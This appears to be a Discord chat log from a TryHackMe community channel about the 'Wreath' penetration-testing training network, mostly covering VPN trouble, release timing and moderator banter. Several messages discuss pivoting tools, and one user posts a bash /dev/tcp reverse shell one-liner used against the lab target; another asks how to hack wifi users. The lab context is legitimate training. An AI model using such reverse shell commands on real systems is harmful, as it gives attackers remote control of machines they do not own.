@opal sky I finished Wreath a couple of weeks ago, but it was very unstable. I'm not sure if it'll be helpful but... checking my notes, I used autossh to stabilize my general SSH connection:

sudo apt install -y autossh
autossh -M 0 -o "ServerAliveInterval 15" -o "ServerAliveCountMax 3" -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -p 22 -i target_id_rsa root@$TARGET

Had to wait for it come back sometimes, but it would autoconnect.

For nmap, I uploaded a static nmap to the first hop server for basic scanning (since it'll lack the scripts). proxychains nmap seemed to work for me thru my autossh connection if you want full -sC features. I don't see where your nmap command is using the proxy... also your sshuttle can't find the keyfile

The network could be off. I did have to take a full day off Wreath because it wouldn't cooperate. Maybe took me 3-4 days given how bad the network was. Best of luck

opal sky
#

Thank you!!

merry robin
opal sky
soft loom
opal sky
winter lintelBOT
#

Gave +1 Rep to @open elk (current: #3231 - 1)

merry robin
winter lintelBOT
#

Gave +1 Rep to @soft loom (current: #33 - 336)

soft loom
# merry robin Now that *is* good to hear, thank you ♥️ Any idea why so many people still see...

The latest stability issues is on me. With the v2 migration I made some mistakes with the VPN profiles. But all of those should have been resolved now (still testing).

A big issue is users not connecting to the VPN correctly or using tryconnectme to debug the connection from the attackbox. Also, for YEARS users have been told if something goes wrong, leave the network and join another one, leading to them not debugging but rather taking the exit route until it works. But with v2 networks, all subnets are the same, so years of that now needs to be de-learned. Which is going to take some time.

You are right, nothing in the golden images changed, so should not be an issue. But I have come to see interesting pesky time-based issues creep in, such as:

  • User accounts expiring
  • AD certificates expiring

These can break the images over time, requiring a refresh then

#

At least with v2 networks, we can now actually refresh these images ourselves. No need for backend access anymore, so the refreshes themselves are easier

merry robin
#

Wreath doesn't have any AD 😄
I seem to remember putting an autogen in for the prod webserver certificate as well, although that may have broken if someone made changes and cloned without resetting it.

soft loom
hardy crypt
cerulean prawn
steady badger
#

hihi i can't seem to access openvpn wreathv2 coz of cipher issues

#

can anyone help

#

i alrdy changed the ciphers in the config file according to instructions but wldn't work

steady badger
muted turret
#

The errors I had was because there were multiple openvpn instances running

#

closed them all up and it worked. Also the network connection takes some time, so the ping command might not work if you joined it too recently.

molten echo
#

how to hack wifi and find information to everyone who connected WiFi?

molten echo
upper quiver
#

Nooooo! Wreath got paywalled 🙃

molten meteor
#

Hey guys, need help downloading the config file to the Wreath room. Nothing happens.

#

I'm a subscriber so shouldn't be because of the streak requirement

#

like I click downlaod and nothing happens

#

Please someone help me because this ain't me

blazing rock
icy perch
#

нi, I had a problem when going through this room. In short, when trying to establish a reverse shell with access to the first target host, the host itself can no longer initiate connections to my PC (I'm using the wreathv2 config). As I understand it, the problem is due to the fact that the first target is on a different subnet (I have 10.250.180.5, and the target is 10.200.180.200)

upper quiver
winter lintelBOT
#

Gave +1 Rep to @upper quiver (current: #161 - 61)

violet knoll
#

Hello everyone!!!

potent goblet
#

Hi all

I’m having an issue where I try to navigate to the access page to get the vpn config file and it gives me a 404 error.
Has anyone else experienced this ?
Also, do we have to use the open vpn client if using the attack box ?

drifting frost
#

why is wreath-pc's curl not working

#

someone help

#

its really frustrating

limpid gyro
#

Hi there, I've been struggling to be able to establish a reverse shell with the second host. Here's what I've tried:

  1. I've been struggling with SShuttle to be able to proxy all it says is that my access is denied
  2. Considering I used chisel, I've tried backgrounding it on the compromised machine (chisel client) and I've tried setting up netcat listener while also attempting to trigger the payload through curl (using the attacker machine)
    Please help, I've kinda been struggling for 3 days tryng to solve this issue 😅
upper quiver
upper quiver
upper quiver
chrome flare
#

Hi everyone, i'm doing this Room and since this afternoon, I suppose that the git-serv isn't working anymore, I don't have any response from this :/

I don't know what to do except restart the network (kinda sucks for me, i'm writing a report while i'm doing the room and changing the IP will be weird I think)

limpid gyro
#

you'll be ayt tho

terse urchin
#

why can't i get an vpn file

#

under access via openvpn in Networks section no network has shown or regenareted even though i've started the network

worthy drum
worthy drum
#

Sorry to hear that. I'm not mastering this enough to help you much further. Tho, try logoff→login→restart network→see if new vpn file gets generated?
Also, I think I've read that when you click to generate, it's best to wait like a few seconds before downloading it. Dunno if this is true or not but it's worth the wait to try.

upper quiver
#

Did you try acessing with a normal THM VPN?
There was some network structure revamps recently (your IP should be in the 192.168.x.x range, no longer 10.x.x.x

upper quiver
#

Nooooooo! When did Wreath get paywalled 😭

misty anvil
#

hey guys how do we get the configuration pack for the wreath network, when attempting to access the link it comes back with a 404.

thick dove
#

I am Unable to start Wreath Network . I have joined the room and downloaded the premium vpn package and connected to it. Kindly Help

lament igloo
# thick dove I am Unable to start Wreath Network . I have joined the room and downloaded the ...

Click Leave Room Rejoin
Click Start Machine again
Wait 2–3 minutes
Restart your VPN connection
Refresh the room page
Try switching VPN servers
Log out then Log back into TryHackMe
Reconnect VPN then confirm Initialization Sequence Completed
Check tun0 then run ip a
Start the machine again in the room
Use correct Premium .ovpn file
Disable other VPNs
Run OpenVPN as Admin
Temporarily disable firewall
Restart PC and try again

#

If still not working send me error message.

lament igloo
frosty merlin
#

Hey , I cannot start the network , cannot generate a vpn file , cannot start attack box ,tried re login still stuck...

frosty merlin
#

any help ?

frosty merlin
#

its really frustrating

lament igloo
hasty carbonBOT
#
TryHackMe's Email

TryHackMe's support email address.

hollow lodge
#

في عرب؟

torn raft
#

Is it just me, or is this network very hit or miss? Even with pinging it stops responding and then randomly starts/stops again

granite cave
vivid loom
#

hey,can anyone help me out please am stuck on getting reverse shell for task 41 .i did what the walkthrough says but still am not getting reverse shell

wary rover
strange bison
#

👀

elder hill
#

👀

snow nexus
#

First

cyan vine
#

12™️

strange bison
#

Wreath >>>>>> Holo

cinder topaz
#

does this mean Wreath soon?!

cyan vine
#

@calm wedge

merry robin
calm wedge
#

NO

#

PLEASE GOD NO

#

SORRY

cyan vine
#

heheheh

merry robin
#

Hors

calm wedge
#

NOOOO

merry robin
#

Why do you have delete perms?

#

Which muppet gave you delete perms?

cyan vine
#

uh oh

calm wedge
#

Muir remove it

cyan vine
#

🏃‍♂️

calm wedge
#

He's abusing perms

cyan vine
#

Don't I need manage messages for the bot @merry robin

cyan vine
#

Cry had manage message perms and could warn people lmao

merry robin
#

Oh, no, I fixed that one

cyan vine
#

eeeeeeeee

merry robin
#

The bot literally won't respond to anyone who isn't a moderator now

cyan vine
#

bet

merry robin
#

As in, it will outright ignore them

#

Exception being the 8ball command

calm wedge
#

!warn @cyan vine mean

cyan vine
#

Damn you got me there

calm wedge
#

Well it's works

cyan vine
#

It's -

calm wedge
#

.

cyan vine
calm wedge
#

F-

#

Ok kekw

rustic shore
#

i am late

calm wedge
#

-warn 270975958511517697 mean but with the right prefix this time*

gusty token
#

gib network

calm wedge
#

yes

fair breach
#

👀👀

bright stirrup
#

👀 👀 👀

fair breach
#

((:

crimson nova
#

gib wreath

blazing rock
#

🥇 🥳 thm Wreath thm 🥳 🥇

lusty imp
#

Giefs wreath

merry robin
pallid vapor
#

🔜

blazing rock
#

Sooner™️ than Soon™️

rocky cedar
#

Soonish™

polar holly
#

waiting

hot cobalt
#

W R E A T H

silk shoal
#

lol i guess the network links are gone

jagged lion
#

What?

#

lol so they are

#

they’re slowly losing all hope

digital tendon
fossil mango
hot cobalt
#

it's a prank guys

dire cliff
#

Gib wreath

latent spoke
long cipher
rocky cedar
#

Wreath was a hoax made to distract people from the delay on holo

strange bison
#

Except wreath was better

merry robin
#

Is tyvm

rocky cedar
#

Muri

latent spoke
#

giv wreath blobknife

rocky cedar
#

Gib me wreath test

merry robin
#

Szy

#

Not even you could do Wreath before it's released

latent spoke
#

I think I can join the room, but muir might ban me blobknife

rocky cedar
#

:(

merry robin
#

There's no point in giving testing access -- it'll be released before you finish

rocky cedar
#

You sure?

merry robin
#

Positive

latent spoke
#

he threatened to do it the last time I joined a pre-release room cri

rocky cedar
#

When is it going to be released then

merry robin
latent spoke
#

ooh, I didn't join this time

merry robin
#

As in, deleting the whole thing

#

Not just banning from the room

latent spoke
#

should join using it 😁

rocky cedar
latent spoke
#

I haven't even joined yet cri

sour bison
#

At least I haven't been banned from this one 😂

calm wedge
pallid vapor
#

W R E A T H

obtuse oyster
#

will it be online tonight EMEA?

#

just so I don't refresh compulsively if it isn't 🙂

pallid vapor
#

🔜

jagged lion
#

@merry robin this is oppression

blazing rock
#

🥳 thm 🥇 Wreath 🥇 thm 🥳

pallid vapor
merry robin
#

Hm

#

-undelete -a

winter lintelBOT
gusty token
merry robin
#

Hi Jay

gusty token
#

@calm wedge kekw

calm wedge
#

frick

blazing rock
#

There is no Spoon but Wreath is Soon™️

merry robin
#

👀

digital tendon
merry robin
tiny crown
rocky cedar
merry robin
#

wreath > throwback > > > > > > > > > hololive

rocky cedar
#

szycooctus0day>>> hololive wreath throwback

merry robin
#

🤷‍♂️

crude drift
barren wren
#

wreath

obtuse oyster
#

Just FYI, kaspersky (incorrectly) flags some download triggered by clicking on the wreath logo as malware.

merry robin
#

Yeah, we're trying to convince them that TryHackMe is not a virus

dusty lodge
#

It's out creepypog

strange bison
#

@merry robin ^

dusty lodge
#

👀 it was under the learn page - networks. Was I not supposed to join yet?

strange bison
#

I think it was meant to be kept quiet

dusty lodge
#

Oh my bad

merry robin
#

Well, cat's out of the bag now

#

It's been soft released for a few hours now

surreal sail
#

Is it required to have a 35 day streak?

merry robin
#

Yeah

surreal sail
#

I gotta wait 35 days, oh brother...just gonna stare at it

strange bison
#

Muir get skidy to update the thing on the streak plz

tiny crown
#

Is the streak requirement gonna be temporary in order to balance the load for now, will there be other ways to get access, or what's up with that?

surreal sail
#

@merry robin solid room btw!

merry robin
strange bison
#

So I imagine it'll be backed down to 20 soonish?

merry robin
#

Or the thing on the site will be changed.

#

I'll sit down with Skidy/Ashu before the hard release and see what's what.

tiny crown
#

I can understand it as a soft release thing, but in general I have been unable to get a very high streak, like I don't have the time to get a streak up for it. So would be nice to see alternatives.

surreal sail
#

its a test run duco. they will most likley come up with efficient alternatives

tiny crown
#

Glad to know it'll be discussed though.

strange bison
#

I have friends who could do with running through it before easter, so I'm hoping something comes up

merry robin
#

I have some ideas around using the subscription to either lower the streak requirement or outright give access. Might be worth thinking about vouchers or something too. No promises there by any means -- it's just spit balling and it's not my decision

tiny crown
#

Again, completely understandable. Hope you guys work smth out that works for everyone

#

Overall from what I could see of the material, good stuff :)

blazing rock
gray mortar
calm wedge
hard mortar
strange bison
dusty lodge
#

Thank you Muiri for creating the network, it's awesome! It shows how much work went into it 🙂

bright stirrup
#

yeeeet

#

7 day streak to access

woven warren
#

time to streak again

vital hill
jagged lion
#

video isnt out yet as the network hasnt been officially released

vital hill
#

makes sense ❤️

safe mason
#

Am I not supposed to join the wreath room yet?

hard mortar
#

Wreath isn't fully released yet, a 7 day streak is currently required as it's a soft launch

vital hill
#

Failed to get reverse shell :/

#

tried lots of time, lots of ways

#

Tried manually as well as , via exploit script

#

then I realized, reverse shell worked for unix only, not the OS of target

#

so only option left - manual

#

but pseduoshell :/ didn't executed it

#

0<&196;exec 196<>/dev/tcp/<My IP>/<unfiltered port>; sh <&196 >&196 2>&196

#

since the target server had not netcat pre-installed

young roost
#

Hey, wanted to ask if we can stream wreath?

#

and is it okay to make public nots based on it

vital hill
young roost
#

nopee gonna start after a while

#

was planning to stream maybe

vital hill
#

Can I DM you please?

young roost
#

sure, but i havent done the lab yet

merry robin
young roost
fair patrol
#

@merry robin I get "You need a 7 day streak to join this room.", but I already had a streak way above that. I can prove this with my badges.
Is this a bug?

merry robin
#

No -- I believe it's current streak (although allowing past streaks based on badges is a neat idea!)
The way it works just now is you have an active 7 day streak to join, then once you're in, that's you good to go from then on (i.e. the streak doesn't actually need maintained after that in order to keep accessing)

#

This is the soft release though, so how it works just now might not be how it works come official release time

fair patrol
#

Alright, thanks 🙂

twilit ravine
#

Really amazed by THM work. Muiri and Dark, Cheers.
Gonna start with it sonnnn.

solemn pendant
#

I seem to be missing one open port in Git Server enumeration, I wonder what I'm doing wrong there.

merry robin
#

Is it 5357 that's missing @solemn pendant?

#

Um, that won't make a lot of sense actually

#

Spin it around -- which ports are you seeing?

solemn pendant
#

That one is missing, yes.

merry robin
#

||80, 3389 and 5985||?

solemn pendant
merry robin
#

Interesting. You're the second person I've heard say that, but I've not been able to replicate it and the testers didn't see it, which would indicate that it's network specific

#

I'll do something with the hint there -- thanks for reporting 🙂